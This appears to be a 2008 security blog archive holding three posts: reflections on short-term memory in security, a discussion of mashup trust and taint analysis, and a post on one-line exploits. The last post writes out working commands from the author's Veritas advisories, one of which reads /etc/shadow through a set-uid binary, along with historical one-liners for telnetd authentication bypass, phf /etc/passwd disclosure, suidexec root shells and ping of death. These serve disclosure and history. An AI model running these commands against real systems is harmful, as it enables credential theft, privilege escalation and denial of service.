=28.Nov.2008= [Fri] at [5:22] · Filed under Author: Derek Callaway, Digital Security, Philosophy, Security Industry, Software Assurance ·Tagged 2008, 2600, attacks, celebrities, code, corporate, hacked, insurance, internet, man-in-the-middle, memory, obama, password, phishing, phone, programmers, sdlc, security, short-term, spoofing, voicemail, weaknesses, wetware
Sometimes I get the feeling that too many Internet users (especially the younger generation) view 1995, or the beginning of commercialized Internet as the start of time itself. More specifically, I notice how people tend to have a short-term memory when it comes to security issues. A recent example of this was all the creative network exploitation scenarios that arose from the great DNS cache poisoning scare of 2008: intercepting e-mails destined for the MX of users who didn’t really click on “Forgot Password,” pushing out phony updates, innovative twists on spear phishing, etc. The fact of the matter is that man-in-the-middle attacks were always a problem; cache poisoning makes them easier but their feasibility has always been within reason. My point is that vendors should address such weaknesses before the proverbial fertilizer hits the windmill.
Too often, short-term memory is the catalyst for reoccurring breaches of information. Sometimes I wonder what (if anything) goes through the mind of one of those celebrities that just got their cell phone hacked for the third time. Maybe it’s something like, “Oh.. those silly hackers! They’ve probably gotten bored by now and they’ll just go away.” Then I wonder how often similar thoughts enter corporate security (in)decision–which is likely to be why cellular carriers neglect to shield their clientele’s voicemail from caller ID spoofing and other shenanigans. Nonetheless, the amusing charade that 2600 pulled on the Obama campaign for April Fool’s Day was simply a case of people believing everything they read on the Internet.
Don’t get me wrong. I’ve seen some major improvements in how larger software vendors are dealing with vulnerabilities, but an overwhelming majority of their security processes are still not up to par. Short-term memory is one of those cases where wetware is the weakest link in the system.
The idea of the digital security industry using long-term memory to become more like insurance companies and less like firefighters is quite intriguing. Putting protective forethought into the equation dramatically changes the playing field. Imagine an SDLC where programmers don’t have to know how to write secure code, or even patch vulnerable code for that matter. I can say for sure that such a proposition will become reality in the not too distant future. Stay tuned…
Like this:
Like Loading...
Permalink
=2.Nov.2008= [Sun] at [21:30] · Filed under Author: Derek Callaway, Digital Security, Misceallaneous, Security Industry, Software Assurance ·Tagged analysis, applications, attacks, binary, business, capgemini, code, dynamic, html, javascript, malicious, mashup, model, networks, privileges, rsa, security, testing, third-party, trust, vista, vulnerability, whitelist

The buzz word “mashup” refers to the tying together of information and functionality from multiple third-party sources. Mashup projects are sure to become a monster of a security problem because of their very nature. This is what John Sluiter of Capgemini predicted at the RSA Europe conference last week during his “Trust in Mashups, the Complex Key” session. This is the abstract:
“Mashups represent a different business model for on-line business and require a specific approach to trust. This session sets out why Mashups are different, describes how trust should be incorporated into the Mashup-based service using Jericho Forum models and presents three first steps for incorporating trust appropriately into new Mashup services.”
Jericho Forum is the international IT security association that published the COA (Collaboration Oriented Architectures) framework. COA advocates the deperimiterisation approach to security and stresses the importance of protecting data instead of relying on firewalls.
So what happens when data from various third-party sources traverses inharmonious networks, applications, and privilege levels? Inevitably, misidentifications occur; erroneous and/or malicious bytes pass through the perimeters. Sensitive data might be accessed by an unprivileged user or attack strings could be received. A good example of such a vulnerability was in the Microsoft Windows Vista Sidebar; a malicious HTML tag gets rendered by the RSS gadget and since it’s in the local zone, arbitrary JavaScript is executed with full privileges (MS07-048.)
New generations of automated tools will need to be created in order to test applications developed using the mashup approach. Vulnerability scanners like nessus, nikto, and WebInspect are best used to discover known weaknesses in input validation and faulty configurations. What they’re not very good at is pointing out errors in custom business logic and more sophisticated attack vectors; that’s where the value of hiring a consultant to perform manual testing comes in.
Whether it’s intentional or not, how can insecure data be prevented from getting sent to or received from a third-party source? A whitelist can be applied to data that is on its way in or out—this helps, but it can be difficult when there are multiple systems and data encodings involved. There is also the problem of determining the presence of sensitive information.
Detecting transmissions of insecure data can be accomplished with binary analyzers. However, static analyzers are at a big disadvantage because they lack execution context. Dynamic analysis is capable of providing more information for tainting data that comes from third-party sources. They are more adept at recognizing unexpected executions paths that tainted data may take after being received from the network or shared code.
Like this:
Like Loading...
Permalink
=22.Oct.2008= [Wed] at [16:44] · Filed under Author: Derek Callaway, Digital Security, Exploits ·Tagged administrator, advisories, attack, award, bandwidth, command, death, debian, example, exhaustion, exploit, foundation, history, information, kingcope, memory, one-liner, phf, ping, pwnie, root, security, sensitive, set-uid, shell, solaris, storage, suidexec, symantec, uninitialized, veritas, vulnerabilities, weakness

Every once in a while there are security vulnerabilities publicized that can be exploited with a single command. This week, Security Objectives published advisories for two such vulnerabilities (SECOBJADV-2008-04 and SECOBJADV-2008-05) which I’ll be describing here. I’ll also be revisiting some one-line exploits from security’s past for nostalgia’s sake and because history tends to repeat itself.
Both issues that were discovered are related to Symantec’s Veritas Storage Foundation Suite. They rely on the default set-uid root bits being set on the affected binaries. Before Symantec and Veritas combined, Sun package manager prompted the administrator with an option of removing the set-id bits. The new Symantec installer just went ahead and set the bits without asking (how rude!)
On to the good stuff.. The first weakness is an uninitialized memory disclosure vulnerability. It can be leveraged like so:
/opt/VRTS/bin/qiomkfile -s 65536 -h 4096 foo
Now, the contents of file .foo (note that it is a dot-file) will contain uninitialized memory from previous file system operations–usually from other users. Sensitive information can be harvested by varying the values to the -s and -h flags over a period of time.
This next one is a bit more critical in terms of privilege escalation. It is somewhat similar to the Solaris srsexec hole from last year. Basically, you can provide any file’s pathname on the command line and have it displayed on stderr. As part of the shell command, I’ve redirected standard error back to standard output.
/opt/VRTSvxfs/sbin/qioadmin -p /etc/shadow / 2>&1
Some of these one-liner exploits can be more useful than exploits that utilize shellcode. Kingcope’s Solaris in.telnetd exploit is a beautiful example of that. The really interesting thing about that one was its resurrection–it originally became well-known back in 1994. In 2007, Kingcope’s version won the Pwnie award for best server-side bug.
telnet -l -fusername hostname
Let’s not forget other timeless classics such as the cgi-bin/phf bug, also from the mid-nineties:
lynx http://host.com/cgi-bin/phf?Qalias=/bin/cat%20/etc/passwd
..and Debian’s suidexec hole from the late nineties:
/usr/bin/suidexec /bin/sh /path/to/script
I’m not including exploits that have pipes/semi-colons/backticks/etc. in the command-line because that’s really more than one command being executed. Since the “Ping of Death” is a single command from a commonly installed system utility I’ll be including it here as well. I consider it a true denial of service attack since it does not rely on bandwidth exhaustion:
ping -s70000 -c1 host
EOF
Like this:
Like Loading...
Permalink